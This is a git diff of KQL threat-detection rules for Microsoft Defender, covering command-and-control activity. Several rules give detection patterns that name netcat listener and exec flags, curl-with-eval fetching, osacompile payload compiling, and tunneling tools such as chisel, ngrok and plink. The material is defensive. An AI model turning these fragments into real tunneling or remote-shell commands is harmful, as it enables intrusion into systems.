attack.execution, attack.t1059.007, attack.t1105 - -DeviceProcessEvents +// Title: Potential In-Memory Download And Compile Of Payloads +// Author: Sohan G (D4rkCiph3r), Red Canary (idea) +// Date: 2023-08-22 +// Level: medium +// Description: Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.execution, attack.t1059.007, attack.t1105 + +DeviceProcessEvents | where ProcessCommandLine contains "osacompile" and ProcessCommandLine contains "curl" \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql b/KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql index 326945dc..6c7f97e0 100644 --- a/KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql +++ b/KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql @@ -1,12 +1,12 @@ -// Title: Potential Linux Amazon SSM Agent Hijacking -// Author: Muhammad Faisal -// Date: 2023-08-03 -// Level: medium -// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.persistence, attack.t1219.002 -// False Positives: -// - Legitimate activity of system administrators - -DeviceProcessEvents +// Title: Potential Linux Amazon SSM Agent Hijacking +// Author: Muhammad Faisal +// Date: 2023-08-03 +// Level: medium +// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.persistence, attack.t1219.002 +// False Positives: +// - Legitimate activity of system administrators + +DeviceProcessEvents | where (ProcessCommandLine contains "-register " and ProcessCommandLine contains "-code " and ProcessCommandLine contains "-id " and ProcessCommandLine contains "-region ") and FolderPath endswith "/amazon-ssm-agent" \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql b/KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql index bf7e4e9f..187c7cc7 100644 --- a/KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql +++ b/KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql @@ -1,10 +1,10 @@ -// Title: Potential RDP Tunneling Via Plink -// Author: Florian Roth (Nextron Systems) -// Date: 2022-08-04 -// Level: high -// Description: Execution of plink to perform data exfiltration and tunneling -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1572 - -DeviceProcessEvents +// Title: Potential RDP Tunneling Via Plink +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-04 +// Level: high +// Description: Execution of plink to perform data exfiltration and tunneling +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572 + +DeviceProcessEvents | where (ProcessCommandLine contains ":127.0.0.1:3389" and FolderPath endswith "\\plink.exe") or ((ProcessCommandLine contains ":3389" and FolderPath endswith "\\plink.exe") and (ProcessCommandLine contains " -P 443" or ProcessCommandLine contains " -P 22")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql b/KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql index df83627f..e620dd1d 100644 --- a/KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql +++ b/KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql @@ -1,10 +1,10 @@ -// Title: Potential RDP Tunneling Via SSH -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-12 -// Level: high -// Description: Execution of ssh.exe to perform data exfiltration and tunneling through RDP -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1572 - -DeviceProcessEvents +// Title: Potential RDP Tunneling Via SSH +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-12 +// Level: high +// Description: Execution of ssh.exe to perform data exfiltration and tunneling through RDP +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572 + +DeviceProcessEvents | where ProcessCommandLine contains ":3389" and FolderPath endswith "\\ssh.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql b/KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql index 346ab1f1..4f983d37 100644 --- a/KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql +++ b/KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql @@ -1,10 +1,10 @@ -// Title: Potential WizardUpdate Malware Infection -// Author: Tim Rauch (rule), Elastic (idea) -// Date: 2022-10-17 -// Level: high -// Description: Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control - -DeviceProcessEvents +// Title: Potential WizardUpdate Malware Infection +// Author: Tim Rauch (rule), Elastic (idea) +// Date: 2022-10-17 +// Level: high +// Description: Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control + +DeviceProcessEvents | where ((ProcessCommandLine contains "=$(curl " and ProcessCommandLine contains "eval") and FolderPath endswith "/sh") or (ProcessCommandLine contains "_intermediate_agent_" and FolderPath endswith "/curl") \ No newline at end of file diff --git a/KQL/rules/Command and Control/potential_xcsset_malware_infection.kql b/KQL/rules/Command and Control/potential_xcsset_malware_infection.kql index a84e9188..4669dddd 100644 --- a/KQL/rules/Command and Control/potential_xcsset_malware_infection.kql +++ b/KQL/rules/Command and Control/potential_xcsset_malware_infection.kql @@ -1,10 +1,10 @@ -// Title: Potential XCSSET Malware Infection -// Author: Tim Rauch (rule), Elastic (idea) -// Date: 2022-10-17 -// Level: medium -// Description: Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control - -DeviceProcessEvents +// Title: Potential XCSSET Malware Infection +// Author: Tim Rauch (rule), Elastic (idea) +// Date: 2022-10-17 +// Level: medium +// Description: Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control + +DeviceProcessEvents | where (((ProcessCommandLine contains "/sys/log.php" or ProcessCommandLine contains "/sys/prepod.php" or ProcessCommandLine contains "/sys/bin/Pods") and FolderPath endswith "/curl" and InitiatingProcessFolderPath endswith "/bash") and ProcessCommandLine contains "https://") or (((ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Group Containers/") and FolderPath endswith "/osacompile" and InitiatingProcessFolderPath endswith "/bash") or ((ProcessCommandLine contains "LSUIElement" and ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Group Containers/") and FolderPath endswith "/plutil" and InitiatingProcessFolderPath endswith "/bash") or ((ProcessCommandLine contains "-r" and ProcessCommandLine contains "/Users/" and ProcessCommandLine contains "/Library/Group Containers/") and FolderPath endswith "/zip")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql b/KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql index eb551610..e3570b2b 100644 --- a/KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql +++ b/KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql @@ -1,12 +1,12 @@ -// Title: Potentially Suspicious Network Connection To Notion API -// Author: Gavin Knapp -// Date: 2023-05-03 -// Level: low -// Description: Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2" -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1102 -// False Positives: -// - Legitimate applications communicating with the "api.notion.com" endpoint that are not already in the exclusion list. The desktop and browser applications do not appear to be using the API by default unless integrations are configured. - -DeviceNetworkEvents +// Title: Potentially Suspicious Network Connection To Notion API +// Author: Gavin Knapp +// Date: 2023-05-03 +// Level: low +// Description: Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2" +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102 +// False Positives: +// - Legitimate applications communicating with the "api.notion.com" endpoint that are not already in the exclusion list. The desktop and browser applications do not appear to be using the API by default unless integrations are configured. + +DeviceNetworkEvents | where RemoteUrl contains "api.notion.com" and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Notion\\Notion.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql b/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql index 788bb520..b5f1787f 100644 --- a/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql +++ b/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql @@ -1,11 +1,11 @@ -// Title: Potentially Suspicious Usage Of Qemu -// Author: Muhammad Faisal (@faisalusuf), Hunter Juhan (@threatHNTR) -// Date: 2024-06-03 -// Level: medium -// Description: Detects potentially suspicious execution of the Qemu utility in a Windows environment. -// Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1090, attack.t1572 - -DeviceProcessEvents +// Title: Potentially Suspicious Usage Of Qemu +// Author: Muhammad Faisal (@faisalusuf), Hunter Juhan (@threatHNTR) +// Date: 2024-06-03 +// Level: medium +// Description: Detects potentially suspicious execution of the Qemu utility in a Windows environment. +// Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090, attack.t1572 + +DeviceProcessEvents | where ((ProcessCommandLine contains "-m 1M" or ProcessCommandLine contains "-m 2M" or ProcessCommandLine contains "-m 3M") and (ProcessCommandLine contains "restrict=off" and ProcessCommandLine contains "-netdev " and ProcessCommandLine contains "connect=" and ProcessCommandLine contains "-nographic")) and (not((ProcessCommandLine contains " -cdrom " or ProcessCommandLine contains " type=virt " or ProcessCommandLine contains " -blockdev "))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql b/KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql index 7b43f616..2ad7a4d3 100644 --- a/KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql +++ b/KQL/rules/Command and Control/printbrm_zip_creation_of_extraction.kql @@ -1,10 +1,10 @@ -// Title: PrintBrm ZIP Creation of Extraction -// Author: frack113 -// Date: 2022-05-02 -// Level: high -// Description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105, attack.defense-evasion, attack.t1564.004 - -DeviceProcessEvents +// Title: PrintBrm ZIP Creation of Extraction +// Author: frack113 +// Date: 2022-05-02 +// Level: high +// Description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105, attack.defense-evasion, attack.t1564.004 + +DeviceProcessEvents | where (ProcessCommandLine contains " -f" and ProcessCommandLine contains ".zip") and FolderPath endswith "\\PrintBrm.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/pua_3proxy_execution.kql b/KQL/rules/Command and Control/pua_3proxy_execution.kql index 94528c9e..0188a5f2 100644 --- a/KQL/rules/Command and Control/pua_3proxy_execution.kql +++ b/KQL/rules/Command and Control/pua_3proxy_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - 3Proxy Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-09-13 -// Level: high -// Description: Detects the use of 3proxy, a tiny free proxy server -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1572 -// False Positives: -// - Administrative activity - -DeviceProcessEvents +// Title: PUA - 3Proxy Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-09-13 +// Level: high +// Description: Detects the use of 3proxy, a tiny free proxy server +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572 +// False Positives: +// - Administrative activity + +DeviceProcessEvents | where FolderPath endswith "\\3proxy.exe" or ProcessCommandLine contains ".exe -i127.0.0.1 -p" or ProcessVersionInfoFileDescription =~ "3proxy - tiny proxy server" \ No newline at end of file diff --git a/KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql b/KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql index c9f1dbfa..42b48bb0 100644 --- a/KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql +++ b/KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - Chisel Tunneling Tool Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-09-13 -// Level: high -// Description: Detects usage of the Chisel tunneling tool via the commandline arguments -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1090.001 -// False Positives: -// - Some false positives may occur with other tools with similar commandlines - -DeviceProcessEvents +// Title: PUA - Chisel Tunneling Tool Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-09-13 +// Level: high +// Description: Detects usage of the Chisel tunneling tool via the commandline arguments +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090.001 +// False Positives: +// - Some false positives may occur with other tools with similar commandlines + +DeviceProcessEvents | where FolderPath endswith "\\chisel.exe" or ((ProcessCommandLine contains "exe client " or ProcessCommandLine contains "exe server ") and (ProcessCommandLine contains "-socks5" or ProcessCommandLine contains "-reverse" or ProcessCommandLine contains " r:" or ProcessCommandLine contains ":127.0.0.1:" or ProcessCommandLine contains "-tls-skip-verify " or ProcessCommandLine contains ":socks")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql b/KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql index a1db24c2..0ede4f6b 100644 --- a/KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql +++ b/KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - Fast Reverse Proxy (FRP) Execution -// Author: frack113, Florian Roth -// Date: 2022-09-02 -// Level: high -// Description: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1090 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: PUA - Fast Reverse Proxy (FRP) Execution +// Author: frack113, Florian Roth +// Date: 2022-09-02 +// Level: high +// Description: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where ProcessCommandLine contains "\\frpc.ini" or (MD5 startswith "7D9C233B8C9E3F0EA290D2B84593C842" or SHA1 startswith "06DDC9280E1F1810677935A2477012960905942F" or SHA256 startswith "57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C") or (FolderPath endswith "\\frpc.exe" or FolderPath endswith "\\frps.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql b/KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql index 9a56d33a..f792faa5 100644 --- a/KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql +++ b/KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA- IOX Tunneling Tool Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-10-08 -// Level: high -// Description: Detects the use of IOX - a tool for port forwarding and intranet proxy purposes -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1090 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: PUA- IOX Tunneling Tool Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-10-08 +// Level: high +// Description: Detects the use of IOX - a tool for port forwarding and intranet proxy purposes +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where FolderPath endswith "\\iox.exe" or (ProcessCommandLine contains ".exe fwd -l " or ProcessCommandLine contains ".exe fwd -r " or ProcessCommandLine contains ".exe proxy -l " or ProcessCommandLine contains ".exe proxy -r ") or (MD5 startswith "9DB2D314DD3F704A02051EF5EA210993" or SHA1 startswith "039130337E28A6623ECF9A0A3DA7D92C5964D8DD" or SHA256 startswith "C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731") \ No newline at end of file diff --git a/KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql b/KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql index 3b02ed3f..4aa48ba4 100644 --- a/KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql +++ b/KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - Netcat Suspicious Execution -// Author: frack113, Florian Roth (Nextron Systems) -// Date: 2021-07-21 -// Level: high -// Description: Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1095 -// False Positives: -// - Legitimate ncat use - -DeviceProcessEvents +// Title: PUA - Netcat Suspicious Execution +// Author: frack113, Florian Roth (Nextron Systems) +// Date: 2021-07-21 +// Level: high +// Description: Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1095 +// False Positives: +// - Legitimate ncat use + +DeviceProcessEvents | where (ProcessCommandLine contains " -lvp " or ProcessCommandLine contains " -lvnp" or ProcessCommandLine contains " -l -v -p " or ProcessCommandLine contains " -lv -p " or ProcessCommandLine contains " -l --proxy-type http " or ProcessCommandLine contains " -vnl --exec " or ProcessCommandLine contains " -vnl -e " or ProcessCommandLine contains " --lua-exec " or ProcessCommandLine contains " --sh-exec ") or (FolderPath endswith "\\nc.exe" or FolderPath endswith "\\ncat.exe" or FolderPath endswith "\\netcat.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/pua_ngrok_execution.kql b/KQL/rules/Command and Control/pua_ngrok_execution.kql index 491b88e1..0be978cd 100644 --- a/KQL/rules/Command and Control/pua_ngrok_execution.kql +++ b/KQL/rules/Command and Control/pua_ngrok_execution.kql @@ -1,14 +1,14 @@ -// Title: PUA - Ngrok Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2021-05-14 -// Level: high -// Description: Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. -// Involved domains are bin.equinox.io for download and *.ngrok.io for connections. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1572 -// False Positives: -// - Another tool that uses the command line switches of Ngrok -// - Ngrok http 3978 (https://learn.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0) - -DeviceProcessEvents +// Title: PUA - Ngrok Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-05-14 +// Level: high +// Description: Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. +// Involved domains are bin.equinox.io for download and *.ngrok.io for connections. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572 +// False Positives: +// - Another tool that uses the command line switches of Ngrok +// - Ngrok http 3978 (https://learn.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0) + +DeviceProcessEvents | where (ProcessCommandLine contains " tcp 139" or ProcessCommandLine contains " tcp 445" or ProcessCommandLine contains " tcp 3389" or ProcessCommandLine contains " tcp 5985" or ProcessCommandLine contains " tcp 5986") or (ProcessCommandLine contains " start " and ProcessCommandLine contains "--all" and ProcessCommandLine contains "--config" and ProcessCommandLine contains ".yml") or ((ProcessCommandLine contains " tcp " or ProcessCommandLine contains " http " or ProcessCommandLine contains " authtoken ") and FolderPath endswith "ngrok.exe") or (ProcessCommandLine contains ".exe authtoken " or ProcessCommandLine contains ".exe start --all") \ No newline at end of file diff --git a/KQL/rules/Command and Control/pua_nimgrab_execution.kql b/KQL/rules/Command and Control/pua_nimgrab_execution.kql index 796c423b..b373859a 100644 --- a/KQL/rules/Command and Control/pua_nimgrab_execution.kql +++ b/KQL/rules/Command and Control/pua_nimgrab_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - Nimgrab Execution -// Author: frack113 -// Date: 2022-08-28 -// Level: high -// Description: Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 -// False Positives: -// - Legitimate use of Nim on a developer systems - -DeviceProcessEvents +// Title: PUA - Nimgrab Execution +// Author: frack113 +// Date: 2022-08-28 +// Level: high +// Description: Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Legitimate use of Nim on a developer systems + +DeviceProcessEvents | where (MD5 startswith "2DD44C3C29D667F5C0EF5F9D7C7FFB8B" or SHA256 startswith "F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559") or FolderPath endswith "\\nimgrab.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql b/KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql index 3724f9df..c87421b7 100644 --- a/KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql +++ b/KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - NPS Tunneling Tool Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-10-08 -// Level: high -// Description: Detects the use of NPS, a port forwarding and intranet penetration proxy server -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1090 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: PUA - NPS Tunneling Tool Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-10-08 +// Level: high +// Description: Detects the use of NPS, a port forwarding and intranet penetration proxy server +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where (ProcessCommandLine contains " -server=" and ProcessCommandLine contains " -vkey=" and ProcessCommandLine contains " -password=") or ProcessCommandLine contains " -config=npc" or (MD5 startswith "AE8ACF66BFE3A44148964048B826D005" or SHA1 startswith "CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181" or SHA256 startswith "5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856") or FolderPath endswith "\\npc.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/quickassist_execution.kql b/KQL/rules/Command and Control/quickassist_execution.kql index 5c5f13fb..d775ccb6 100644 --- a/KQL/rules/Command and Control/quickassist_execution.kql +++ b/KQL/rules/Command and Control/quickassist_execution.kql @@ -1,12 +1,12 @@ -// Title: QuickAssist Execution -// Author: Muhammad Faisal (@faisalusuf) -// Date: 2024-12-19 -// Level: low -// Description: Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate use of Quick Assist in the environment. - -DeviceProcessEvents +// Title: QuickAssist Execution +// Author: Muhammad Faisal (@faisalusuf) +// Date: 2024-12-19 +// Level: low +// Description: Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use of Quick Assist in the environment. + +DeviceProcessEvents | where FolderPath endswith "\\QuickAssist.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql b/KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql index 4fc16d9e..2b3e030b 100644 --- a/KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql +++ b/KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql @@ -1,10 +1,10 @@ -// Title: RDP Over Reverse SSH Tunnel -// Author: Samir Bousseaden -// Date: 2019-02-16 -// Level: high -// Description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389 -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001, car.2013-07-002 - -DeviceNetworkEvents +// Title: RDP Over Reverse SSH Tunnel +// Author: Samir Bousseaden +// Date: 2019-02-16 +// Level: high +// Description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389 +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001, car.2013-07-002 + +DeviceNetworkEvents | where (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "::1/128")) and (InitiatingProcessFolderPath endswith "\\svchost.exe" and LocalPort == 3389) \ No newline at end of file diff --git a/KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql b/KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql index bafdc6f3..a71eedb4 100644 --- a/KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql +++ b/KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql @@ -1,10 +1,10 @@ -// Title: RDP to HTTP or HTTPS Target Ports -// Author: Florian Roth (Nextron Systems) -// Date: 2022-04-29 -// Level: high -// Description: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443 -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001, car.2013-07-002 - -DeviceNetworkEvents +// Title: RDP to HTTP or HTTPS Target Ports +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-29 +// Level: high +// Description: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443 +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001, car.2013-07-002 + +DeviceNetworkEvents | where (RemotePort in~ ("80", "443")) and InitiatingProcessFolderPath endswith "\\svchost.exe" and LocalPort == 3389 \ No newline at end of file diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql index f84a0641..d348e0b5 100644 --- a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql @@ -1,14 +1,14 @@ -// Title: Remote Access Tool - AnyDesk Execution -// Author: frack113 -// Date: 2022-02-11 -// Level: medium -// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: Remote Access Tool - AnyDesk Execution +// Author: frack113 +// Date: 2022-02-11 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: 